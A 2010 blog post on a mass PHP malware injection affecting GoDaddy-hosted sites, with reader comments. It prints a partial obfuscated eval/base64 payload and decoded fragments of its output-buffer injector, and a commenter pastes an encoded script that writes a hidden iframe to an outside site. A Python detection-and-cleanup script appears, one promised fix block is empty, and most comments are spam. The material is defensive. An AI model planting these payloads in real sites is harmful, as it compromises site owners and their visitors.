GoDaddy PHP sites hacked again

During April-May of this year, attackers compromised sites on GoDaddy shared hosting.
It seems they are back at work now, because in the past 2-3 some sites (mostly WordPress blogs) have also been hacked by the same attackers.

Many sites hosted by GoDaddy are being hacked at the moment. This blog was also caught in that malware attack, but fortunately I found a solution and have also transferred my hosting.

The malware is injected automatically into .php files: it picks any file and pastes its code into it.

The injected code looks like this (only part of the code, not the full code):

[cc lang="php"]
eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAk
R0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHM
oJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sIm
dvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4g
YmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5dGVXSnNhVzVrYzNSMVpHbHZhVzVtYjI5dWJHbHVaUzV
qYjIwdmJHd3VjR2h3SWo0OEwzTmpjbWx3ZEQ0PSIpOyAgICAgIH0gICAgICByZXR1cm4gIiI7ICAgICB9ICAgIH0gICAgICAgIGlmKC
FmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpeyAgICAgZnVuY3Rpb24gZ3pkZWNvZGUoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2
MTFBNTY0Njg0Qyl7ICAgICAgJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RD1Ab3JkKEBzdWJzdHIoJ….
[/cc]

This code behaves as follows:
the base64 string decodes to the PHP code shown in the snippet below, and the eval function executes that code.

[cc lang="php"]
// First fragment: the start of this copy is missing; it begins inside the
// preg_replace() call of mrobh(), which is shown in full further down.
]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
      }
      else
      {
        return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
      }
    }
    ob_start('mrobh'); // registers mrobh() as the output-buffer callback
  }
}
?>

// Second fragment: the end of a function whose beginning is not shown, then mrobh().
      if($R034AE2AB94F99CC81B389A1822DA3353===FALSE)
      {
        $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;
      }
      return $R034AE2AB94F99CC81B389A1822DA3353;
    }
  }

  // Output-buffer callback: inserts gml()'s output before </body>, or appends it.
  function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B)
  {
    Header('Content-Encoding: none');
    $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
    if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE))
    {
      return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
    }
    else
    {
      return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
    }
  }
  //ob_start('mrobh');
 }
}
?>
[/cc]

PHP sites hosted on servers other than GoDaddy should probably also be checked for this malware.

If your site is infected with this malware, run the script from this post and your site will be cleaned in a moment.

You can also use the same script to verify whether your site was infected. If you get the message

[cc lang="php"]0 Infected Files ./[/cc]

then your site is clean. If you get a list of infected files instead, click on "Fix files" and within a few seconds your site will be cleaned of this malware.
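A minimal offline version of the infected-file check described above, written in Python as an added example; it is not the cleanup script this post links to. The function names and the constructed sample are assumptions, and the marker strings are the names that appear in this page's sample once its base64 layer is decoded.

```python
import base64
import re
from pathlib import Path

# Names visible in this page's sample once its base64 layer is decoded.
MARKERS = (b"mr_no", b"mrobh", b"gml(")

# eval(base64_decode("...")) as injected into .php files; whitespace tolerated.
INJECTION = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*["']([A-Za-z0-9+/=\s]+)["']\s*\)\s*\)\s*;?""")

def decode_payload(b64_text):
    """Decode base64 that may be line-wrapped or cut short."""
    data = re.sub(r"[^A-Za-z0-9+/]", "", b64_text)  # drop whitespace and padding
    if len(data) % 4 == 1:                          # lone trailing char holds no full byte
        data = data[:-1]
    return base64.b64decode(data + "=" * (-len(data) % 4))

def find_injections(php_source):
    """Return (offset, markers) for every injected eval whose payload matches."""
    hits = []
    for m in INJECTION.finditer(php_source):
        decoded = decode_payload(m.group(1))
        found = [k.decode() for k in MARKERS if k in decoded]
        if found:
            hits.append((m.start(), found))
    return hits

def strip_injections(php_source):
    """Remove only the eval statements that carry the markers; keep everything else."""
    def repl(m):
        decoded = decode_payload(m.group(1))
        return "" if any(k in decoded for k in MARKERS) else m.group(0)
    return INJECTION.sub(repl, php_source)

def scan_tree(root):
    """Map each infected .php file under root (relative path) to its hits."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = find_injections(path.read_text(errors="replace"))
        if hits:
            report[str(path.relative_to(root))] = hits
    return report

# Constructed sample: a harmless stub that only sets the guard variable.
STUB_B64 = base64.b64encode(b"if(!isset($GLOBALS['mr_no'])){$GLOBALS['mr_no']=1;}").decode()
SAMPLE_INFECTED = '<?php eval(base64_decode("' + STUB_B64 + '")); ?><?php\necho "hello";\n'

if __name__ == "__main__":
    print(find_injections(SAMPLE_INFECTED))
    print(strip_injections(SAMPLE_INFECTED))
```

Run `scan_tree()` against a downloaded copy of the site and keep a backup before writing any stripped file back. An `eval(base64_decode(...))` whose payload lacks the markers is left untouched and should be reviewed by hand.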

Thanks to blog tips for this trick.

Here is another solution, which I have just made and which is working for me and some other sites.

Create a file that is included in your script before any other file. Be sure that no other code is placed before this file inclusion.

In this file, write the code below:

[cc lang=”php”]
[/cc]

Save this file and upload it to your server. This prevents the malware code from being executed; you can see why by checking the very first condition of that code.

Best of luck….

  • Raj
    September 19, 2010 at 3:59 am

    Today again thousands of websites got infected, godaddy is not even answering the phone…

    for me this fix worked…
    http://alltips.in/how-to-fix-godaddy-malware-attack.html

    thanks..

  • attorney
    September 19, 2010 at 6:58 am

    Thanks dude. That is fun knowing.

  • Sacramento
    September 19, 2010 at 6:30 pm

    Valuable information and excellent design you got here! I would like to thank you for sharing your thoughts and time into the stuff you post!! Thumbs up

  • Closeout
    September 20, 2010 at 2:02 am

    I’m doing some research in this field and your post has helped a lot, thank you.

  • Todd Redfoot
    September 20, 2010 at 7:34 am

    The exploit affecting PHP files on several Go Daddy accounts this past weekend has been resolved.

    Go Daddy’s Security Team worked quickly to clean and restore all affected sites. The exploit was caused by malicious files uploaded via FTP to customer websites.

    As a good security practice, Go Daddy recommends all customers change their FTP passwords on a regular basis. To modify your FTP password please follow the steps provided in our help documentation at http://gdhelp.godaddy.com/article/6

    As always, Go Daddy’s Security Team is here for you. If you ever suspect your site is under attack, please fill out our security submission form, located here – http://www.godaddy.com/securityissue – and notify Go Daddy’s 24/7 Customer Support.

    Thank you,
    Todd Redfoot
    Go Daddy Chief Information Security Officer

    • Avinash
      September 20, 2010 at 10:03 am

      Hi Todd,
      Thanks for the information.
      One more question. One of my blogs was hacked and it's placing some JS code in PHP files. The code looks like below:

      eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%
      74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%
      22%68%74%74%70%3A%2F%2F%71%61%77%66%65%72%2E%63%
      6F%6D%2F%3F%36%30%34%35%37%38%22%20%77%69%64%74%
      68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%
      66%72%61%6D%65%3E%27%29'));

      I don’t know how to remove this. This website is not hosted on GoDaddy, but any help from your team would be appreciated.
      Thanks
      Avi

  • Cary
    September 22, 2010 at 5:52 am

    I desired to thank you for this concerning article. I definitely favorite every little bit of it. I have bookmarked your web site to see the modern stuff you put up.

  • Darrin Greenwald
    September 24, 2010 at 11:50 am

    I think this post was probably a strong start to a potential series of articles about this topic. Most writers pretend to know what they are preaching about when it comes to this stuff and really, nearly no one actually gets it. You seem to know about it however, so I think you ought to take it and run. Thank you!

  • lerp life insurance
    September 24, 2010 at 12:41 pm

    I’m very glad that you said this!?!

  • weighty
    September 27, 2010 at 5:09 am

    gonna send this to my mom

  • Jeanette Boutros
    September 28, 2010 at 8:29 am

    Thanks for posting this.

  • Vivien Buer
    September 29, 2010 at 12:57 am

    Thanks for the info, been looking everywhere for information on this.
